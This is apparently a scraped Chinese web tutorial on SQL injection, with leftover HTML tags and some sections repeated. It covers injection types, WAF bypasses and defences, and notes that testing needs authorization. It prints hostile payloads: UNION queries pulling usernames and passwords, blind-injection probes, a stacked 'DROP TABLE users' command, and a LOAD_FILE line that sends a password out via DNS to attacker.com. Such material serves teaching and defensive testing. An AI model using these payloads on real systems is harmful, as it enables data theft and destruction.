SQL注入精粹：从0到1的注入之路<\/h1>

1. SQL注入基础概念<\/h2>
SQL注入(SQL Injection)是一种常见的Web安全漏洞，攻击者通过在应用程序的输入字段中插入恶意的SQL代码，从而欺骗数据库服务器执行非预期的SQL命令。<\/p>

1.1 SQL注入原理<\/h3>

应用程序未对用户输入进行充分过滤和验证<\/li>
恶意输入被拼接到SQL查询中<\/li>
数据库执行了包含恶意代码的完整查询<\/li>

攻击者可以读取、修改或删除数据库中的数据<\/li> <\/ul>

1.2 SQL注入危害<\/h3>

数据泄露（用户凭证、个人信息等）<\/li>
数据篡改<\/li>
数据库服务器被控制<\/li>
拒绝服务攻击<\/li>

整个系统沦陷<\/li> <\/ul>

2. SQL注入类型<\/h2>

2.1 基于错误的注入<\/h3>
利用数据库返回的错误信息获取数据库结构信息。<\/p>

2.2 联合查询注入<\/h3>
使用UNION操作符将恶意查询与原始查询合并执行。<\/p>

2.3 布尔盲注<\/h3>
通过页面返回的真假状态推断信息。<\/p>

2.4 时间盲注<\/h3>
通过数据库响应时间差异推断信息。<\/p>

2.5 堆叠查询<\/h3>
执行多个SQL语句，利用分号(;)分隔。<\/p>

3. 关键注入技术详解<\/h2>

3.1 基础注入技术<\/h3>

3.1.1 单引号测试<\/h4>

' OR '1'='1
<\/code><\/pre>
3.1.2 注释符使用<\/h4>
' -- 
' # 
' \/* *\/
<\/code><\/pre>
3.2 联合查询注入详解<\/h3>
3.2.1 确定列数<\/h4>
ORDER BY n -- 通过递增n直到报错确定列数
<\/code><\/pre>
3.2.2 UNION注入<\/h4>
UNION SELECT 1,2,3 -- 确定显示位
UNION SELECT username,password,3 FROM users -- 获取数据
<\/code><\/pre>
3.3 报错注入技术<\/h3>
3.3.1 floor(rand(0)*2)报错原理<\/h4>
SELECT<\/span> COUNT<\/span>(*<\/span>), CONCAT((SELECT<\/span> database<\/span>()), FLOOR(RAND(0<\/span>)*<\/span>2<\/span>)) AS<\/span> x 
<\/span><\/span>FROM<\/span> information_schema.tables 
<\/span><\/span>GROUP<\/span> BY<\/span> x
<\/span><\/span><\/code><\/pre>
rand(0)<\/code>：以0为种子生成随机数序列<\/li>
rand(0)*2<\/code>：将随机数乘以2<\/li>
floor(rand(0)*2)<\/code>：取整，结果为0或1<\/li>
当使用GROUP BY时，由于rand()的随机性会导致主键冲突报错<\/li>
<\/ul>
3.3.2 其他报错函数<\/h4>
extractvalue()
updatexml()
exp()
geometrycollection()
polygon()
<\/code><\/pre>
3.4 盲注技术<\/h3>
3.4.1 布尔盲注<\/h4>
AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'
<\/code><\/pre>
3.4.2 时间盲注<\/h4>
IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0)
<\/code><\/pre>
3.5 堆叠查询<\/h3>
'; DROP TABLE users; --
<\/code><\/pre>
4. 数据库特性与绕过技巧<\/h2>
4.1 MySQL特性<\/h3>

注释：-- <\/code>, #<\/code>, \/* *\/<\/code><\/li>
字符串连接：CONCAT()<\/code>, ||<\/code>（需设置PIPES_AS_CONCAT）<\/li>
信息获取：information_schema<\/code><\/li>
<\/ul>
4.2 MSSQL特性<\/h3>

注释：--<\/code>, \/* *\/<\/code><\/li>
字符串连接：+<\/code><\/li>
信息获取：sysobjects<\/code>, syscolumns<\/code><\/li>
<\/ul>
4.3 Oracle特性<\/h3>

注释：--<\/code>, \/* *\/<\/code><\/li>
字符串连接：||<\/code><\/li>
信息获取：all_tables<\/code>, all_tab_columns<\/code><\/li>
<\/ul>
4.4 绕过技巧<\/h3>
4.4.1 大小写混合<\/h4>
SeLeCt
<\/code><\/pre>
4.4.2 内联注释<\/h4>
\/*!SELECT*\/
<\/code><\/pre>
4.4.3 编码绕过<\/h4>
%27 OR %271%27=%271
<\/code><\/pre>
4.4.4 等价函数替换<\/h4>
SUBSTRING() -> MID() -> SUBSTR()
<\/code><\/pre>
4.4.5 空白符替换<\/h4>
%09 (TAB), %0A (换行), %0C (换页), %0D (回车)
<\/code><\/pre>
5. 防御措施<\/h2>
5.1 输入验证<\/h3>

白名单验证<\/li>
数据类型检查<\/li>
长度限制<\/li>
<\/ul>
5.2 参数化查询<\/h3>
使用预编译语句，分离SQL代码和数据。<\/p>
5.3 最小权限原则<\/h3>
数据库账户只授予必要权限。<\/p>
5.4 错误处理<\/h3>
自定义错误页面，不暴露数据库错误信息。<\/p>
5.5 Web应用防火墙(WAF)<\/h3>
过滤恶意请求。<\/p>
6. 实战演练<\/h2>
6.1 注入点识别<\/h3>

寻找用户输入点<\/li>
测试特殊字符响应<\/li>
判断注入类型<\/li>
<\/ol>
6.2 信息收集<\/h3>

数据库版本<\/li>
数据库名称<\/li>
表名和列名<\/li>
数据提取<\/li>
<\/ol>
6.3 自动化工具使用<\/h3>

sqlmap<\/li>
Havij<\/li>
Burp Suite<\/li>
<\/ul>
7. 高级技巧<\/h2>
7.1 DNS外带数据<\/h3>
LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\share'))
<\/code><\/pre>
7.2 二进制数据提取<\/h3>
使用HEX()或ASCII()函数处理二进制数据。<\/p>
7.3 文件读写<\/h3>
SELECT ... INTO OUTFILE
LOAD_FILE()
<\/code><\/pre>
8. 法律与道德<\/h2>

SQL注入测试必须获得授权<\/li>
未经授权的测试可能构成犯罪<\/li>
遵循负责任的披露原则<\/li>
<\/ul>
9. 学习资源<\/h2>

OWASP SQL Injection Prevention Cheat Sheet<\/li>
SQL Injection Wiki<\/li>
Web安全测试实践指南<\/li>
<\/ul>

这篇文档涵盖了SQL注入的核心知识点，从基础概念到高级技巧，并包含了勘误中提到的floor(rand(0)*2)<\/code>报错注入的详细解释。实际应用中请确保遵守法律法规，仅在授权环境下进行安全测试。<\/p>

SQL注入精粹：从0到1的注入之路<\/h1>

1. SQL注入基础概念<\/h2> SQL注入(SQL Injection)是一种常见的Web安全漏洞，攻击者通过在应用程序的输入字段中插入恶意的SQL代码，从而欺骗数据库服务器执行非预期的SQL命令。<\/p>

2. SQL注入类型<\/h2>

2.1 基于错误的注入<\/h3> 利用数据库返回的错误信息获取数据库结构信息。<\/p>

2.2 联合查询注入<\/h3> 使用UNION操作符将恶意查询与原始查询合并执行。<\/p>

2.3 布尔盲注<\/h3> 通过页面返回的真假状态推断信息。<\/p>

2.4 时间盲注<\/h3> 通过数据库响应时间差异推断信息。<\/p>

2.5 堆叠查询<\/h3> 执行多个SQL语句，利用分号(;)分隔。<\/p>

3. 关键注入技术详解<\/h2>

3.1 基础注入技术<\/h3>

3.2 联合查询注入详解<\/h3>

3.3 报错注入技术<\/h3>

3.4 盲注技术<\/h3>

4. 数据库特性与绕过技巧<\/h2>

4.4 绕过技巧<\/h3>

5. 防御措施<\/h2>

5.2 参数化查询<\/h3> 使用预编译语句，分离SQL代码和数据。<\/p>

5.3 最小权限原则<\/h3> 数据库账户只授予必要权限。<\/p>

5.4 错误处理<\/h3> 自定义错误页面，不暴露数据库错误信息。<\/p>

5.5 Web应用防火墙(WAF)<\/h3> 过滤恶意请求。<\/p>

6. 实战演练<\/h2>

7. 高级技巧<\/h2>

7.2 二进制数据提取<\/h3> 使用HEX()或ASCII()函数处理二进制数据。<\/p>

1. SQL注入基础概念<\/h2>
SQL注入(SQL Injection)是一种常见的Web安全漏洞，攻击者通过在应用程序的输入字段中插入恶意的SQL代码，从而欺骗数据库服务器执行非预期的SQL命令。<\/p>

2.1 基于错误的注入<\/h3>
利用数据库返回的错误信息获取数据库结构信息。<\/p>

2.2 联合查询注入<\/h3>
使用UNION操作符将恶意查询与原始查询合并执行。<\/p>

2.3 布尔盲注<\/h3>
通过页面返回的真假状态推断信息。<\/p>

2.4 时间盲注<\/h3>
通过数据库响应时间差异推断信息。<\/p>

2.5 堆叠查询<\/h3>
执行多个SQL语句，利用分号(;)分隔。<\/p>

5.2 参数化查询<\/h3>
使用预编译语句，分离SQL代码和数据。<\/p>

5.3 最小权限原则<\/h3>
数据库账户只授予必要权限。<\/p>

5.4 错误处理<\/h3>
自定义错误页面，不暴露数据库错误信息。<\/p>

5.5 Web应用防火墙(WAF)<\/h3>
过滤恶意请求。<\/p>

7.2 二进制数据提取<\/h3>
使用HEX()或ASCII()函数处理二进制数据。<\/p>